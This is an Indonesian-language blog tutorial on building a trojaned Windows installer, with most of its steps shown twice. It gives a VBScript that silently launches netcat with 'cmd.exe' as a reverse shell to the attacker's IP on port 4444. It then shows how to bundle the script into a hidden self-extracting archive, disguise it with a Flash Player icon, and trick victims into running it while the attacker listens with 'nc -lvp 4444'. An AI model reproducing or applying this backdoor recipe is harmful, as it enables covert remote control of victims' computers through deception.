demi kemajuan IT dan opensource Indonesia. Pada kesempatan ini gw mau
ngeshare mengenai tehnik simple bagaimana mendapat akses remote shell
di windows dengan fasilitas netcat di backtrack. Ok baca resepnya
terlebih dahulu. Simplenya tutorial ini akan mengajarkan kita untuk
menyisipkan program backdoor pada salah satu installer windows, sehingga
akan membuka koneksi remot pada saat program terkontaminasi di esekusi
oleh korban
Remote windows with netcat
======================
Target : windows xp1,xp2,xp3,win7,vista
Attacker : Linux Backtrack R2
need :
- Netcat windows version ( download here )
- Reshacker windows version ( download here )
- FlashPlayer Installer ( dalam hal ini ane memilih flash player untuk sample.. bisa ente gunakan exe yang lain )
- winrar ( windows version )
- Netcat Linux version ( included on backtrack R2 )
- Script NC-Remote
copas aja gan .. ane males jelasin cara kerja script ini
First Step
Ok pertama-tama edit script tadi pake notepad atau apa saja ganti kata-kata ip-ente dengan ip address pada komputer yang akan anda jadikan penyerang. simpan dengan nama zee.vbs
foto
Second Step
Siapkan Program NetCat yang sudah anda download terus bikin sfx archives di gabungkan dengan script yang sudah ente edit tadi ( zee.vbs )
foto
Pilih Advance SFX options tabs terus edit path to extract. Untuk kasus kali ini gw samplekan c:/ Hilangkan centang pada save & restore paths. Dan pada setup program ( run before extraction ) ketikan zee.vbs , agar setelah di extrak nanti zee.vbs akan langsung di esekusi pada path c:/
foto
Klik mode terus centang hide all
foto
Kemudian esekusi rar nya …..
Third Step
klik run terus ketik di situ iexpress lalu enter …lalu tinggal next-next aja sampe nanti di minta untuk memasukan file-file apa saja yang mau di gabungkan dalam satu install self extraction pada windows.Jangan lupa untuk mencentang hiden proses untuk menipu target . Simpan dengan extention exe
Pembuatan self extraction selesai. Langkah terakhir kita ganti icon default dengan icon flash player installer dengan rest hacker.
foto
Ok file backdoor sudah ready. Terserah cara anda untuk memasukan file backdoor tadi ke komputer korban. Bisa lewat bujukan , download atau apa saja sesuai dengan kreasi ente
4th Step
Sekarang pada backtrack anda ketikan peritah di bawah ini untuk mengaktifkan nc
root@ibteam:~# nc -lvp 4444
Kita tinggal menunggu agar korban mengeklik backdoor yang sudah ente siapkan tadi …kalo sudah di klik .. sudah dapat di pastikan nc pada terminal akan memulai session remote
heheheh kita berhasil mendapatkan shell akses.. selanjutnya terserah ente ..
kalo kurang2 ngerti penjelasan ane.. silahkan download video tutorial yang udah ane bikin di bawah ini
http://www.ziddu.com/download/14911011/ncbackdoor.rar.html
======================
Target : windows xp1,xp2,xp3,win7,vista
Attacker : Linux Backtrack R2
need :
- Netcat windows version ( download here )
- Reshacker windows version ( download here )
- FlashPlayer Installer ( dalam hal ini ane memilih flash player untuk sample.. bisa ente gunakan exe yang lain )
- winrar ( windows version )
- Netcat Linux version ( included on backtrack R2 )
- Script NC-Remote
copas aja gan .. ane males jelasin cara kerja script ini
Const HIDDEN_WINDOW = 1 strComputer = "." Set objStartup = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_ProcessStartup") Set objProcess = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_Process") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = HIDDEN_WINDOW errReturn = objProcess.Create("C:\nc.exe -d -e cmd.exe ip-ente 4444", null, objConfig, intProcessID)Ok let we start ….
First Step
Ok pertama-tama edit script tadi pake notepad atau apa saja ganti kata-kata ip-ente dengan ip address pada komputer yang akan anda jadikan penyerang. simpan dengan nama zee.vbs
foto
Second Step
Siapkan Program NetCat yang sudah anda download terus bikin sfx archives di gabungkan dengan script yang sudah ente edit tadi ( zee.vbs )
foto
Pilih Advance SFX options tabs terus edit path to extract. Untuk kasus kali ini gw samplekan c:/ Hilangkan centang pada save & restore paths. Dan pada setup program ( run before extraction ) ketikan zee.vbs , agar setelah di extrak nanti zee.vbs akan langsung di esekusi pada path c:/
foto
Klik mode terus centang hide all
foto
Kemudian esekusi rar nya …..
Third Step
klik run terus ketik di situ iexpress lalu enter …lalu tinggal next-next aja sampe nanti di minta untuk memasukan file-file apa saja yang mau di gabungkan dalam satu install self extraction pada windows.Jangan lupa untuk mencentang hiden proses untuk menipu target . Simpan dengan extention exe
Pembuatan self extraction selesai. Langkah terakhir kita ganti icon default dengan icon flash player installer dengan rest hacker.
foto
Ok file backdoor sudah ready. Terserah cara anda untuk memasukan file backdoor tadi ke komputer korban. Bisa lewat bujukan , download atau apa saja sesuai dengan kreasi ente
4th Step
Sekarang pada backtrack anda ketikan peritah di bawah ini untuk mengaktifkan nc
root@ibteam:~# nc -lvp 4444
Kita tinggal menunggu agar korban mengeklik backdoor yang sudah ente siapkan tadi …kalo sudah di klik .. sudah dapat di pastikan nc pada terminal akan memulai session remote
heheheh kita berhasil mendapatkan shell akses.. selanjutnya terserah ente ..
kalo kurang2 ngerti penjelasan ane.. silahkan download video tutorial yang udah ane bikin di bawah ini
http://www.ziddu.com/download/14911011/ncbackdoor.rar.html
Tidak ada komentar:
Posting Komentar